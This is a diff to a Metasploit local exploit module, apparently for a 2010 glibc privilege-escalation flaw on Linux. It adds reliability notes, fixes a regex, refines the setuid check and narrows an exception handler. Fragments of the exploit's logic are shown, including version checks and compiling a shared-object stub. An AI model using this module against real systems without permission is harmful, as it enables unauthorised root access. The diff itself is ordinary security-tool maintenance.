@@ -49,7 +49,6 @@ class MetasploitModule < Msf::Exploit::Local
         ],
         'DisclosureDate' => '2010-10-18',
         'Platform' => 'linux',
-        'Arch' => [ ARCH_X86, ARCH_X64 ],
         'SessionTypes' => [ 'shell', 'meterpreter' ],
         'Targets' => [
           [ 'Automatic', {} ],
@@ -79,6 +78,11 @@ class MetasploitModule < Msf::Exploit::Local
               stdapi_fs_delete_file
             ]
           }
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK]
         }
       )
     )
@@ -100,7 +104,7 @@ class MetasploitModule < Msf::Exploit::Local
 
   def check
     glibc_banner = cmd_exec 'ldd --version'
-    glibc_version = Rex::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d\.]+)/).flatten.first
+    glibc_version = Rex::Version.new glibc_banner.scan(/^ldd\s+\(.*\)\s+([\d.]+)/).flatten.first
     if glibc_version.to_s.eql? ''
       vprint_error 'Could not determine the GNU C library version'
       return CheckCode::Safe
@@ -131,10 +135,9 @@ class MetasploitModule < Msf::Exploit::Local
     end
     vprint_good "Found #{lib} in #{@lib_dir}"
 
-    unless setuid? suid_exe_path
-      vprint_error "#{suid_exe_path} is not setuid"
-      return CheckCode::Detected
-    end
+    return CheckCode::Safe("#{suid_exe_path} file not found") unless file? suid_exe_path
+    return CheckCode::Detected("#{suid_exe_path} is not setuid") unless setuid? suid_exe_path
+
     vprint_good "#{suid_exe_path} is setuid"
 
     CheckCode::Appears
@@ -216,7 +219,7 @@ class MetasploitModule < Msf::Exploit::Local
 
     begin
       so = Metasm::ELF.compile_c(cpu, so_stub).encode_string(:lib)
-    rescue
+    rescue StandardError
       print_error "Metasm encoding failed: #{$ERROR_INFO}"
       elog "Metasm encoding failed: #{$ERROR_INFO.class} : #{$ERROR_INFO}"
       elog "Call stack:\n#{$ERROR_INFO.backtrace.join "\n"}"
